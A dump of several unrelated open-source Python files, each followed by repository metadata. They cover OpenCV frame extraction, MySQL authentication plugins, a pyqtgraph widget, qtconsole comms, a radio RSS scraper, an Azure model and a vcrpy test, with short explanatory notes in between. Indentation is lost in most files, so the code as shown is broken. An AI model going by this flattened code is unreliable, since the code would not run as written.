if int(ivideo['timestamps'][0]['timestamp']) <= int(timestamp) < int(ivideo['timestamps'][len(ivideo['timestamps'])-1]['timestamp']):
print 'IF'
self.array_timestamps=ivideo['timestamps']
self.videoname=ivideo['name']
self.videopath=self.videopath+'/'+self.videofolder+'/'+self.videoname
self.array_timestamps=ivideo['timestamps']
self.capture = cv2.VideoCapture(self.videopath+'/'+self.videofolder+'/'+self.videoname) #video_name is the video being called
while not self.capture.isOpened():
pass
self.videolength = int(self.capture.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))
break
print 'self.videopath=',self.videopath
return self.videopath
def show_frame(self,timestamp,name_window):
numframe=self.estimate_frame(timestamp)
print 'numframe=',numframe
self.capture.set(1,numframe); # Where numframe is the frame you want
ret, frame = self.capture.read() # Read the frame
cv2.imshow(name_window, frame) # show frame on window
def save_frame(self,numframe=None,timestamp=None):
self.capture.set(1,numframe); # Where numframe is the frame you want
ret, frame = self.capture.read() # Read the frame
cv2.imshow('window_name', frame) # show frame on window
key=cv2.waitKey(0)
def show_gif(self,init_timestamp,end_timestamp,name_window):
init_numframe=self.estimate_frame(init_timestamp)
end_numframe=self.estimate_frame(end_timestamp)
gif_numframe=init_numframe
while gif_numframe<end_numframe:
self.capture.set(1,gif_numframe); # Where numframe is the frame you want
ret, frame = self.capture.read() # Read the frame
cv2.imshow(name_window, frame) # show frame on window
time.sleep(0.2)
#key=cv2.waitKey(0)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
gif_numframe +=1
key=cv2.waitKey(0)
def save_roi(self,numframe,rect_target,name,timestamp,path_folder_output):
ymin=rect_target.y_offset
ymax=rect_target.y_offset+rect_target.height
xmin=rect_target.x_offset
xmax=rect_target.x_offset+rect_target.width
self.capture.set(1,numframe); # Where numframe is the frame you want
ret, frame = self.capture.read() # Read the frame
roi_new_user=frame[ymin:ymax,xmin:xmax]
path_image=path_folder_output+'/'+name
if not os.path.exists(path_image):
os.makedirs(path_image)
cv2.imwrite(path_image+'/'+str(timestamp)+'.png',roi_new_user)
path_image=path_folder_output+'/frames'
if not os.path.exists(path_image):
os.makedirs(path_image)
cv2.imwrite(path_image+'/'+str(timestamp)+'.png',frame)
def rosimage(self,numframe=None,timestamp=None):
resp=None
if numframe is None:
numframe=self.estimate_frame(timestamp)
if numframe is not None:
self.capture.set(1,numframe); # Where numframe is the frame you want
ret, frame = self.capture.read() # Read the frame
cv2.imshow('window_name', frame) # show frame on window
#image=Image()
bridge = CvBridge()
ros_image=bridge.cv2_to_imgmsg(frame, "bgr8")
return ros_image ,numframe
# def ms_face_api_call_file(self,numframe=None,timestamp=None):
#
# #
# #sensor_msgs/Image image
# ## if a filename is given, load the file
# #string filename
# ## if a topic name is given, wait for an image on that topic
# #string topic
# #bool identify
# #---
# #ms_face_api/Faces faces
#
# self.capture.set(1,numframe); # Where numframe is the frame you want
# ret, frame = self.capture.read() # Read the frame
# cv2.imshow('window_name', frame) # show frame on window
# filename='/media/robpin/data/videos/collect_data_y4/actively_engaged/'+str(timestamp)+'.png'
# cv2.imwrite(filename,frame)
#
# image=Image()
#
# print 'CALLING SERVICE'
#
# #resp=ms_face_call(image,'/media/robpin/data/videos/collect_data_y4/2016_11/2016_11_11/843.png','',False)
# resp=ms_face_call(image,filename,'',False)
#
# iface=0
# for face in resp.faces.faces:
#
# color=(0, 255, 0)
# cv2.rectangle(frame, (face.faceRectangle.x_offset, face.faceRectangle.y_offset), (face.faceRectangle.x_offset+face.faceRectangle.width, face.faceRectangle.y_offset+face.faceRectangle.height), color, 2)
# font = cv2.FONT_HERSHEY_SIMPLEX
# cv2.putText(frame,"Person "+str(iface),(face.faceRectangle.x_offset, face.faceRectangle.y_offset - 5), font, 0.7,color,2)
# iface+=1
#
# cv2.imshow('window_name', frame) # show frame on window
#
# return resp
def estimate_frame(self, timestamp) :
length_timestamp=None
inf_frame=None
length_frames=None
inf_timestamp=None
for i in range(len(self.array_timestamps)-1):
if int(self.array_timestamps[i]['timestamp']) <= timestamp < int(self.array_timestamps[i+1]['timestamp']):
length_timestamp=int(self.array_timestamps[i+1]['timestamp'])-int(self.array_timestamps[i]['timestamp'])
length_frames=int(self.array_timestamps[i+1]['num_frame'])-int(self.array_timestamps[i]['num_frame'])
inf_frame=int(self.array_timestamps[i]['num_frame'])
inf_timestamp=int(self.array_timestamps[i]['timestamp'])
nframe=None
if length_frames is not None:
video_rate=float(length_timestamp)/float(length_frames)
nframe=float(float(timestamp-inf_timestamp)/video_rate)+inf_frame
nframe=int(round(nframe))
return nframe
def estimate_timestamp(self, numframe) :
#print 'current_timestamp=',timestamp
length_timestamp=None
inf_frame=None
length_frames=None
inf_timestamp=None
for i in range(len(self.array_timestamps)-1):
if int(self.array_timestamps[i]['num_frame']) <= numframe < int(self.array_timestamps[i+1]['num_frame']):
length_timestamp=int(self.array_timestamps[i+1]['timestamp'])-int(self.array_timestamps[i]['timestamp'])
length_frames=int(self.array_timestamps[i+1]['num_frame'])-int(self.array_timestamps[i]['num_frame'])
inf_frame=int(self.array_timestamps[i]['num_frame'])
inf_timestamp=int(self.array_timestamps[i]['timestamp'])
#print 'length_frames=',length_frames
#print 'inf_frame=',inf_frame
nframe=None
if length_frames is not None:
video_rate=float(length_timestamp)/float(length_frames)
# nframe=float(float(timestamp-inf_timestamp)/video_rate)+inf_frame
#
# nframe=int(round(nframe))
timestamp=float(float(numframe-inf_frame)*video_rate)+inf_timestamp
timestamp=int(round(timestamp))
#print 'nframe=',nframe
return timestamp
def detect_faces(self ,timestamp,framesnumber=1,increment=1):
faces=None
numframe=self.estimate_frame(timestamp)
newframe=numframe
if numframe is not None:
indexframe=0
countframesnumber=0
while countframesnumber < framesnumber:
try:
newframe=numframe+indexframe
self.capture.set(1,newframe); # Where numframe is the frame you want
ret, frame = self.capture.read() # Read the frame
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
cv2.imshow('face detection', gray)
# Detect faces in the image
faces = self.faceCascade.detectMultiScale(
gray,
scaleFactor=1.1,
minNeighbors=5,
minSize=(30, 30),
flags = cv2.cv.CV_HAAR_SCALE_IMAGE
)
indexframe=indexframe+increment
countframesnumber+=1
if len(faces)>0:
print 'detect_faces break'
break
except:
pass
return faces,newframe
def detect_faces_image(self ,image):
faces=None
frame=cv2.imread(image)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# Detect faces in the image
faces = self.faceCascade.detectMultiScale(
gray,
scaleFactor=1.1,
minNeighbors=5,
minSize=(30, 30),
flags = cv2.cv.CV_HAAR_SCALE_IMAGE
)
return faces
|
strands-project/aaf_deployment
|
face_analysis/scripts/opencv_tools.py
|
Python
|
mit
| 12,514
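estimate_frame above linearly interpolates between the recorded (timestamp, num_frame) anchor pairs that bracket the query. The arithmetic in isolation, with a tiny made-up anchor table:

def estimate_frame(array_timestamps, timestamp):
    # Linear interpolation between bracketing anchors, as in ExtractFrame above.
    for a, b in zip(array_timestamps, array_timestamps[1:]):
        t0, t1 = int(a['timestamp']), int(b['timestamp'])
        f0, f1 = int(a['num_frame']), int(b['num_frame'])
        if t0 <= timestamp < t1:
            video_rate = float(t1 - t0) / float(f1 - f0)   # time units per frame
            return int(round((timestamp - t0) / video_rate)) + f0
    return None

anchors = [
    {'timestamp': '1000', 'num_frame': '0'},
    {'timestamp': '2000', 'num_frame': '25'},
]
print(estimate_frame(anchors, 1400))   # 10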
|
# MySQL Connector/Python - MySQL driver written in Python.
# Copyright (c) 2014, 2015, Oracle and/or its affiliates. All rights reserved.
# MySQL Connector/Python is licensed under the terms of the GPLv2
# <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>, like most
# MySQL Connectors. There are special exceptions to the terms and
# conditions of the GPLv2 as it is applied to this software, see the
# FOSS License Exception
# <http://www.mysql.com/about/legal/licensing/foss-exception.html>.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Implementing support for MySQL Authentication Plugins"""
import struct
from hashlib import sha1
from . import errors
from .catch23 import PY2, isstr
class BaseAuthPlugin(object):
"""Base class for authentication plugins
Classes inheriting from BaseAuthPlugin should implement the method
prepare_password(). When instantiating, auth_data argument is
required. The username, password and database are optional. The
ssl_enabled argument can be used to tell the plugin whether SSL is
active or not.
The method auth_response() method is used to retrieve the password
which was prepared by prepare_password().
"""
requires_ssl = False
plugin_name = ''
def __init__(self, auth_data, username=None, password=None, database=None,
ssl_enabled=False):
"""Initialization"""
self._auth_data = auth_data
self._username = username
self._password = password
self._database = database
self._ssl_enabled = ssl_enabled
def prepare_password(self):
"""Prepares and returns password to be send to MySQL
This method needs to be implemented by classes inheriting from
this class. It is used by the auth_response() method.
Raises NotImplementedError.
"""
raise NotImplementedError
def auth_response(self):
"""Returns the prepared password to send to MySQL
Raises InterfaceError on errors. For example, when SSL is required
        but not enabled.
Returns str
"""
if self.requires_ssl and not self._ssl_enabled:
raise errors.InterfaceError("{name} requires SSL".format(
name=self.plugin_name))
return self.prepare_password()
class MySQLNativePasswordAuthPlugin(BaseAuthPlugin):
"""Class implementing the MySQL Native Password authentication plugin"""
requires_ssl = False
plugin_name = 'mysql_native_password'
def prepare_password(self):
"""Prepares and returns password as native MySQL 4.1+ password"""
if not self._auth_data:
raise errors.InterfaceError("Missing authentication data (seed)")
if not self._password:
return b''
password = self._password
if isstr(self._password):
password = self._password.encode('utf-8')
else:
password = self._password
if PY2:
password = buffer(password) # pylint: disable=E0602
try:
auth_data = buffer(self._auth_data) # pylint: disable=E0602
except TypeError:
raise errors.InterfaceError("Authentication data incorrect")
else:
password = password
auth_data = self._auth_data
hash4 = None
try:
hash1 = sha1(password).digest()
hash2 = sha1(hash1).digest()
hash3 = sha1(auth_data + hash2).digest()
if PY2:
xored = [ord(h1) ^ ord(h3) for (h1, h3) in zip(hash1, hash3)]
else:
xored = [h1 ^ h3 for (h1, h3) in zip(hash1, hash3)]
hash4 = struct.pack('20B', *xored)
except Exception as exc:
raise errors.InterfaceError(
"Failed scrambling password; {0}".format(exc))
return hash4
class MySQLClearPasswordAuthPlugin(BaseAuthPlugin):
"""Class implementing the MySQL Clear Password authentication plugin"""
requires_ssl = True
plugin_name = 'mysql_clear_password'
def prepare_password(self):
"""Returns password as as clear text"""
if not self._password:
return b'\x00'
password = self._password
if PY2:
if isinstance(password, unicode): # pylint: disable=E0602
password = password.encode('utf8')
elif isinstance(password, str):
password = password.encode('utf8')
return password + b'\x00'
class MySQLSHA256PasswordAuthPlugin(BaseAuthPlugin):
"""Class implementing the MySQL SHA256 authentication plugin
Note that encrypting using RSA is not supported since the Python
Standard Library does not provide this OpenSSL functionality.
"""
requires_ssl = True
plugin_name = 'sha256_password'
def prepare_password(self):
"""Returns password as as clear text"""
if not self._password:
return b'\x00'
password = self._password
if PY2:
if isinstance(password, unicode): # pylint: disable=E0602
password = password.encode('utf8')
elif isinstance(password, str):
password = password.encode('utf8')
return password + b'\x00'
def get_auth_plugin(plugin_name):
"""Return authentication class based on plugin name
This function returns the class for the authentication plugin plugin_name.
The returned class is a subclass of BaseAuthPlugin.
Raises errors.NotSupportedError when plugin_name is not supported.
Returns subclass of BaseAuthPlugin.
"""
for authclass in BaseAuthPlugin.__subclasses__(): # pylint: disable=E1101
if authclass.plugin_name == plugin_name:
return authclass
raise errors.NotSupportedError(
"Authentication plugin '{0}' is not supported".format(plugin_name))
|
LuciferJack/python-mysql-pool
|
PyMysqlPool/mysql/connector/authentication.py
|
Python
|
mit
| 6,479
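get_auth_plugin is a plain subclass lookup keyed on plugin_name, and the native-password plugin implements the classic MySQL 4.1 scramble: SHA1(password) XOR SHA1(seed + SHA1(SHA1(password))). A standalone Python 3 sketch of that scramble (the connector's class additionally handles Python 2 buffers and wraps failures in InterfaceError):

import struct
from hashlib import sha1

def native_password_scramble(password, auth_seed):
    # SHA1(password) XOR SHA1(seed + SHA1(SHA1(password))) -> 20-byte response.
    hash1 = sha1(password).digest()
    hash2 = sha1(hash1).digest()
    hash3 = sha1(auth_seed + hash2).digest()
    xored = [h1 ^ h3 for h1, h3 in zip(hash1, hash3)]
    return struct.pack('20B', *xored)

scramble = native_password_scramble(b'secret', b'12345678901234567890')
print(len(scramble))   # 20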
|
from ..Qt import QtGui, QtCore, QtWidgets
from ..GraphicsScene import GraphicsScene
from .GraphicsItem import GraphicsItem
__all__ = ['GraphicsWidget']
class GraphicsWidget(GraphicsItem, QtWidgets.QGraphicsWidget):
_qtBaseClass = QtWidgets.QGraphicsWidget
def __init__(self, *args, **kargs):
"""
        **Bases:** :class:`GraphicsItem <pyqtgraph.GraphicsItem>`, :class:`QtWidgets.QGraphicsWidget`
Extends QGraphicsWidget with several helpful methods and workarounds for PyQt bugs.
Most of the extra functionality is inherited from :class:`GraphicsItem <pyqtgraph.GraphicsItem>`.
"""
QtWidgets.QGraphicsWidget.__init__(self, *args, **kargs)
GraphicsItem.__init__(self)
## done by GraphicsItem init
#GraphicsScene.registerObject(self) ## workaround for pyqt bug in graphicsscene.items()
# Removed due to https://bugreports.qt-project.org/browse/PYSIDE-86
#def itemChange(self, change, value):
## BEWARE: Calling QGraphicsWidget.itemChange can lead to crashing!
##ret = QtGui.QGraphicsWidget.itemChange(self, change, value) ## segv occurs here
## The default behavior is just to return the value argument, so we'll do that
## without calling the original method.
#ret = value
#if change in [self.ItemParentHasChanged, self.ItemSceneHasChanged]:
#self._updateView()
#return ret
def setFixedHeight(self, h):
self.setMaximumHeight(h)
self.setMinimumHeight(h)
    def setFixedWidth(self, w):
        self.setMaximumWidth(w)
        self.setMinimumWidth(w)
def height(self):
return self.geometry().height()
def width(self):
return self.geometry().width()
def boundingRect(self):
br = self.mapRectFromParent(self.geometry()).normalized()
#print "bounds:", br
return br
def shape(self): ## No idea why this is necessary, but rotated items do not receive clicks otherwise.
p = QtGui.QPainterPath()
p.addRect(self.boundingRect())
#print "shape:", p.boundingRect()
return p
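# Illustrative sketch: a minimal subclass relying on the helpers defined above.
# The scene/layout wiring is omitted; this only shows the added convenience API.
#
#     class FixedBox(GraphicsWidget):
#         def __init__(self):
#             GraphicsWidget.__init__(self)
#             self.setFixedWidth(100)   # pins minimum and maximum width
#             self.setFixedHeight(30)
#
# boundingRect() and shape() then follow whatever geometry the layout assigns.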
|
mylxiaoyi/mypyqtgraph-qt5
|
pyqtgraph/graphicsItems/GraphicsWidget.py
|
Python
|
mit
| 2,172
|
# -*- coding: utf-8 -*-
"""
traceview.discovery
This module contains the objects associated with Discovery API resources.
http://dev.appneta.com/docs/api-v2/discovery.html
"""
from .resource import Resource
class Action(Resource):
def get(self):
return self.api.get('actions')
class Browser(Resource):
def get(self):
return self.api.get('browsers')
class Controller(Resource):
def get(self):
return self.api.get('controllers')
class Domain(Resource):
def get(self):
return self.api.get('domains')
class Layer(Resource):
def get(self, app, *args, **kwargs):
path = 'layers/{app}'.format(app=app)
return self.api.get(path, *args, **kwargs)
class Metric(Resource):
def get(self):
return self.api.get('metrics')
class Region(Resource):
def get(self):
return self.api.get('regions')
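# Illustrative sketch: each resource only needs an object exposing
# api.get(path, ...). Assuming the Resource base class stores that object as
# self.api (an assumption; see resource.py), usage might look like:
#
#     domains = Domain(api).get()
#     layers = Layer(api).get('MyApp')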
|
danriti/python-traceview
|
traceview/discovery.py
|
Python
|
mit
| 896
|
# pylint: disable=missing-docstring,blacklisted-name,invalid-name,not-callable
dependency = None
foo = None
bar = None
def do_work_using_import_module():
dependency.foo()
dependency.bar()
def do_work_using_from_import():
foo()
bar()
|
whyzdev/impject
|
tpkg/production_no_import.py
|
Python
|
mit
| 253
|
"""
Based on
https://github.com/jupyter/notebook/blob/master/notebook/static/services/kernels/comm.js
https://github.com/ipython/ipykernel/blob/master/ipykernel/comm/manager.py
https://github.com/ipython/ipykernel/blob/master/ipykernel/comm/comm.py
Which are distributed under the terms of the Modified BSD License.
"""
import logging
from traitlets.config import LoggingConfigurable
from ipython_genutils.importstring import import_item
from ipython_genutils.py3compat import string_types
import uuid
from qtpy import QtCore
from qtconsole.util import MetaQObjectHasTraits, SuperQObject
class CommManager(MetaQObjectHasTraits(
'NewBase', (LoggingConfigurable, SuperQObject), {})):
"""
Manager for Comms in the Frontend
"""
def __init__(self, kernel_client, *args, **kwargs):
super(CommManager, self).__init__(*args, **kwargs)
self.comms = {}
self.targets = {}
if kernel_client:
self.init_kernel_client(kernel_client)
def init_kernel_client(self, kernel_client):
"""
connect the kernel, and register message handlers
"""
self.kernel_client = kernel_client
kernel_client.iopub_channel.message_received.connect(self._dispatch)
@QtCore.Slot(object)
def _dispatch(self, msg):
"""Dispatch messages"""
msg_type = msg['header']['msg_type']
handled_msg_types = ['comm_open', 'comm_msg', 'comm_close']
if msg_type in handled_msg_types:
getattr(self, msg_type)(msg)
def new_comm(self, target_name, data=None, metadata=None,
comm_id=None, buffers=None):
"""
Create a new Comm, register it, and open its Kernel-side counterpart
Mimics the auto-registration in `Comm.__init__` in the Jupyter Comm.
argument comm_id is optional
"""
comm = Comm(target_name, self.kernel_client, comm_id)
self.register_comm(comm)
try:
comm.open(data, metadata, buffers)
except Exception:
self.unregister_comm(comm)
raise
return comm
def register_target(self, target_name, f):
"""Register a callable f for a given target name
f will be called with two arguments when a comm_open message is
        received with this `target_name`:
- the Comm instance
- the `comm_open` message itself.
f can be a Python callable or an import string for one.
"""
if isinstance(f, string_types):
f = import_item(f)
self.targets[target_name] = f
def unregister_target(self, target_name, f):
"""Unregister a callable registered with register_target"""
return self.targets.pop(target_name)
def register_comm(self, comm):
"""Register a new comm"""
comm_id = comm.comm_id
comm.kernel_client = self.kernel_client
self.comms[comm_id] = comm
comm.sig_is_closing.connect(self.unregister_comm)
return comm_id
@QtCore.Slot(object)
def unregister_comm(self, comm):
"""Unregister a comm, and close its counterpart."""
# unlike get_comm, this should raise a KeyError
comm.sig_is_closing.disconnect(self.unregister_comm)
self.comms.pop(comm.comm_id)
def get_comm(self, comm_id, closing=False):
"""Get a comm with a particular id
Returns the comm if found, otherwise None.
This will not raise an error,
it will log messages if the comm cannot be found.
If the comm is closing, it might already have closed,
so this is ignored.
"""
try:
return self.comms[comm_id]
except KeyError:
if closing:
return
self.log.warning("No such comm: %s", comm_id)
# don't create the list of keys if debug messages aren't enabled
if self.log.isEnabledFor(logging.DEBUG):
self.log.debug("Current comms: %s", list(self.comms.keys()))
# comm message handlers
def comm_open(self, msg):
"""Handler for comm_open messages"""
content = msg['content']
comm_id = content['comm_id']
target_name = content['target_name']
f = self.targets.get(target_name, None)
comm = Comm(target_name, self.kernel_client, comm_id)
self.register_comm(comm)
if f is None:
self.log.error("No such comm target registered: %s", target_name)
else:
try:
f(comm, msg)
return
except Exception:
self.log.error("Exception opening comm with target: %s",
target_name, exc_info=True)
# Failure.
try:
comm.close()
except Exception:
self.log.error(
"Could not close comm during `comm_open` failure "
"clean-up. The comm may not have been opened yet.""",
exc_info=True)
def comm_close(self, msg):
"""Handler for comm_close messages"""
content = msg['content']
comm_id = content['comm_id']
comm = self.get_comm(comm_id, closing=True)
if comm is None:
return
self.unregister_comm(comm)
try:
comm.handle_close(msg)
except Exception:
self.log.error('Exception in comm_close for %s', comm_id,
exc_info=True)
def comm_msg(self, msg):
"""Handler for comm_msg messages"""
content = msg['content']
comm_id = content['comm_id']
comm = self.get_comm(comm_id)
if comm is None:
return
try:
comm.handle_msg(msg)
except Exception:
self.log.error('Exception in comm_msg for %s', comm_id,
exc_info=True)
class Comm(MetaQObjectHasTraits(
'NewBase', (LoggingConfigurable, SuperQObject), {})):
"""
Comm base class
"""
sig_is_closing = QtCore.Signal(object)
def __init__(self, target_name, kernel_client, comm_id=None,
msg_callback=None, close_callback=None):
"""
Create a new comm. Must call open to use.
"""
super(Comm, self).__init__(target_name=target_name)
self.target_name = target_name
self.kernel_client = kernel_client
if comm_id is None:
comm_id = uuid.uuid1().hex
self.comm_id = comm_id
self._msg_callback = msg_callback
self._close_callback = close_callback
self._send_channel = self.kernel_client.shell_channel
def _send_msg(self, msg_type, content, data, metadata, buffers):
"""
Send a message on the shell channel.
"""
if data is None:
data = {}
if content is None:
content = {}
content['comm_id'] = self.comm_id
content['data'] = data
msg = self.kernel_client.session.msg(
msg_type, content, metadata=metadata)
if buffers:
msg['buffers'] = buffers
return self._send_channel.send(msg)
# methods for sending messages
def open(self, data=None, metadata=None, buffers=None):
"""Open the kernel-side version of this comm"""
return self._send_msg(
'comm_open', {'target_name': self.target_name},
data, metadata, buffers)
def send(self, data=None, metadata=None, buffers=None):
"""Send a message to the kernel-side version of this comm"""
return self._send_msg(
'comm_msg', {}, data, metadata, buffers)
def close(self, data=None, metadata=None, buffers=None):
"""Close the kernel-side version of this comm"""
self.sig_is_closing.emit(self)
return self._send_msg(
'comm_close', {}, data, metadata, buffers)
# methods for registering callbacks for incoming messages
def on_msg(self, callback):
"""Register a callback for comm_msg
Will be called with the `data` of any comm_msg messages.
Call `on_msg(None)` to disable an existing callback.
"""
self._msg_callback = callback
def on_close(self, callback):
"""Register a callback for comm_close
Will be called with the `data` of the close message.
Call `on_close(None)` to disable an existing callback.
"""
self._close_callback = callback
# methods for handling incoming messages
def handle_msg(self, msg):
"""Handle a comm_msg message"""
self.log.debug("handle_msg[%s](%s)", self.comm_id, msg)
if self._msg_callback:
return self._msg_callback(msg)
def handle_close(self, msg):
"""Handle a comm_close message"""
self.log.debug("handle_close[%s](%s)", self.comm_id, msg)
if self._close_callback:
return self._close_callback(msg)
__all__ = ['CommManager']
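# Illustrative sketch of the frontend comm API above, assuming an already
# connected qtconsole kernel_client. The kernel side must register the same
# target name for any traffic to flow; the names below are placeholders only.
#
#     manager = CommManager(kernel_client)
#
#     def on_open(comm, open_msg):          # called for incoming comm_open
#         comm.on_msg(lambda msg: print(msg['content']['data']))
#
#     manager.register_target('my_target', on_open)
#
#     comm = manager.new_comm('my_target', data={'hello': 'world'})
#     comm.send({'progress': 0.5})
#     comm.close()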
|
sserrot/champion_relationships
|
venv/Lib/site-packages/qtconsole/comms.py
|
Python
|
mit
| 8,976
|
# coding=utf-8
import datetime
import logging
import re
from lxml import etree
from lxml import html
import requests
import requests.utils
import ziniurrss.cache
import ziniurrss.feed
import ziniurrss.parallel
log = logging.getLogger(__name__)
def get_remote_content(url):
log.debug('Getting [%s].' % url)
user_agent = requests.utils.default_user_agent('ziniurrss.herokuapp.com')
return requests.get(url, headers={'User-Agent': user_agent}).text
def parse_show_list():
page = get_shows_page()
tree = html.fromstring(page)
options = tree.xpath('//select[@id="show_id"]/option')
shows = {}
for option in options[1:]:
show_id = option.xpath('@value')[0]
show_name = option.xpath('text()')[0]
shows[show_id] = show_name
return shows
def get_shows_page():
url = 'http://www.ziniuradijas.lt/archyvas/laidu-irasai'
return get_remote_content(url)
def get_show_page(show_id=29006, page_no=1):
# the friendly show name in url is irrelevant
url = 'http://www.ziniuradijas.lt/laida/_/%s?page=%s' % (str(show_id), str(page_no))
return get_remote_content(url)
def parse_show_info(page):
tree = html.fromstring(page)
show_title = tree.xpath('//a[@class="show-title"]/text()')[0]
friendly_show_url = 'http://www.ziniuradijas.lt' + tree.xpath('//a[@class="show-title"]/@href')[0]
desc = tree.xpath('//div[@class="description"]')[0].text_content()
desc = desc.strip()
# desc = re.sub(r"^\s+$", "", desc)
desc = re.sub(r"\n+", "\n", desc)
images = tree.xpath('//div[@class="top-show"]/img/@src')
image = images[0] if images else None
return {
'title': show_title,
'url': friendly_show_url,
'image': image,
'description': desc,
}
def parse_page_count(page):
tree = html.fromstring(page)
# 2 'pagination' components in a page
    pages = len(tree.xpath('//div[@class="pagination"]//a')) // 2  # integer division so range() below gets an int
if pages == 0:
return 1
else:
return pages
def get_episode_page(url):
return get_remote_content(url)
def parse_date(link):
if '?' in link:
ts = int(link[str(link).index('?') + 1:])
return datetime.datetime.utcfromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
else:
return None
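# Illustrative note: the media links carry the publication time as a Unix
# timestamp after '?', so for example
#     parse_date('http://example.invalid/download.mp3?1500000000')
# returns '2017-07-14 02:40:00' (UTC), while a link without '?' yields None.
# The URL here is a placeholder.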
def parse_episode(episode_html, use_cache=False):
episode_html = html.fromstring(episode_html)
show_link = 'http://www.ziniuradijas.lt' + episode_html.xpath('div/a/@href')[0]
description = episode_html.xpath('div[2]/div/p/text()')[0] if episode_html.xpath('div[2]/div/p/text()') else ""
page = get_cached_episode_page(show_link, use_cache)
links = parse_links(page)
if not links:
log.debug("No media link for [%s], skipping." % show_link)
return None
    show_date = parse_date(links[-1]) # TODO: handle all media link times
if not show_date:
show_date = episode_html.xpath('p[@class="date"]/text()')[0]
episode = {
'date': show_date,
'description': description,
'show_link': show_link,
'media_links': links,
}
return episode
def parse_episodes(page, limit=0, use_cache=False):
tree = html.fromstring(page)
episodes = []
episodes_dom = tree.xpath('//div[@class="new"]')
for episode_dom in episodes_dom:
episode = parse_episode(etree.tostring(episode_dom), use_cache)
if not episode:
continue
episodes.append(episode)
if len(episodes) == limit and limit != 0:
log.debug("Reached limit=%s, breaking." % limit)
break
return episodes
def parse_links(page):
tree = html.fromstring(page)
media_links = tree.xpath('//a[@class="download"]/@href')
if media_links:
result = []
for x in media_links:
result.append(x)
return result
else:
return None
def get_all(show_id, limit=0, use_cache=True, threads=1):
page = get_cached_show_page(show_id, 1, use_cache)
show_info = parse_show_info(page)
pages = parse_page_count(page)
episodes = []
for page_no in range(1, pages + 1):
        if page_no != 1:  # page 1 was already fetched above
page = get_cached_show_page(show_id, page_no, use_cache)
if threads > 1:
log.warn("Using experimental parallel version with %s threads." % threads)
if limit:
episodes += ziniurrss.parallel.parse_episodes_parallel_limited(page, limit=limit - len(episodes),
use_cache=use_cache, threads=threads)
else:
log.debug("Using unlimited parallel retrieval.")
episodes += ziniurrss.parallel.parse_episodes_parallel(page, use_cache=use_cache, threads=threads)
else:
episodes += parse_episodes(page, limit=limit - len(episodes), use_cache=use_cache)
        if limit != 0 and len(episodes) >= limit:
episodes = episodes[:limit]
break
return show_info, episodes
def get_cached_show_page(show_id, page_no=1, use_cache=False):
retrieval_function = lambda: get_show_page(show_id, page_no)
if use_cache:
filename = '/ziniurrss_show_%s_%s' % (show_id, page_no)
return ziniurrss.cache.get_cached_page(filename, retrieval_function)
else:
return retrieval_function()
def get_cached_episode_page(link, use_cache=False):
retrieval_function = lambda: get_episode_page(link)
if use_cache:
filename = '/ziniurrss_episode_%s' % (hash(link)) # TODO: better include episode id in filename
return ziniurrss.cache.get_cached_page(filename, retrieval_function)
else:
return retrieval_function()
def main():
(show_info, episodes) = get_all(show_id=29006, limit=2)
print(ziniurrss.feed.get_feed_as_string(show_info, episodes))
if __name__ == '__main__':
logging.basicConfig(
datefmt='%H:%M:%S',
format='%(asctime)s %(levelname)8s [%(name)s] - %(message)s - (File "%(pathname)s", line %(lineno)d)',
level=logging.DEBUG
)
main()
|
tori3852/ziniurrss
|
src/ziniurrss/main.py
|
Python
|
mit
| 6,120
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class GroupGetMemberGroupsParameters(Model):
"""Request parameters for GetMemberGroups API call.
All required parameters must be populated in order to send to Azure.
:param additional_properties: Unmatched properties from the message are
     deserialized to this collection
:type additional_properties: dict[str, object]
:param security_enabled_only: Required. If true, only membership in
security-enabled groups should be checked. Otherwise, membership in all
groups should be checked.
:type security_enabled_only: bool
"""
_validation = {
'security_enabled_only': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'security_enabled_only': {'key': 'securityEnabledOnly', 'type': 'bool'},
}
def __init__(self, *, security_enabled_only: bool, additional_properties=None, **kwargs) -> None:
super(GroupGetMemberGroupsParameters, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.security_enabled_only = security_enabled_only
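# Illustrative sketch: security_enabled_only is keyword-only and required, so a
# caller constructs the model as, for example,
#
#     params = GroupGetMemberGroupsParameters(security_enabled_only=True)
#
# and msrest serializes it via _attribute_map to {"securityEnabledOnly": true}.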
|
Azure/azure-sdk-for-python
|
sdk/graphrbac/azure-graphrbac/azure/graphrbac/models/group_get_member_groups_parameters_py3.py
|
Python
|
mit
| 1,627
|
import pytest
import vcr
from six.moves.urllib.request import urlopen
def test_making_extra_request_raises_exception(tmpdir, httpbin):
    # make two requests while recording the first cassette; they are considered
    # identical by the matcher (since matching is based on method only)
with vcr.use_cassette(str(tmpdir.join("test.json")), match_on=["method"]):
urlopen(httpbin.url + "/status/200")
urlopen(httpbin.url + "/status/201")
# Now, try to make three requests. The first two should return the
# correct status codes in order, and the third should raise an
# exception.
with vcr.use_cassette(str(tmpdir.join("test.json")), match_on=["method"]):
assert urlopen(httpbin.url + "/status/200").getcode() == 200
assert urlopen(httpbin.url + "/status/201").getcode() == 201
with pytest.raises(Exception):
urlopen(httpbin.url + "/status/200")
|
Azure/azure-sdk-for-python
|
tools/vcrpy/tests/integration/test_multiple.py
|
Python
|
mit
| 886
|
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import os
import unittest
from monty.serialization import dumpfn, loadfn
from pymatgen.core.structure import Molecule
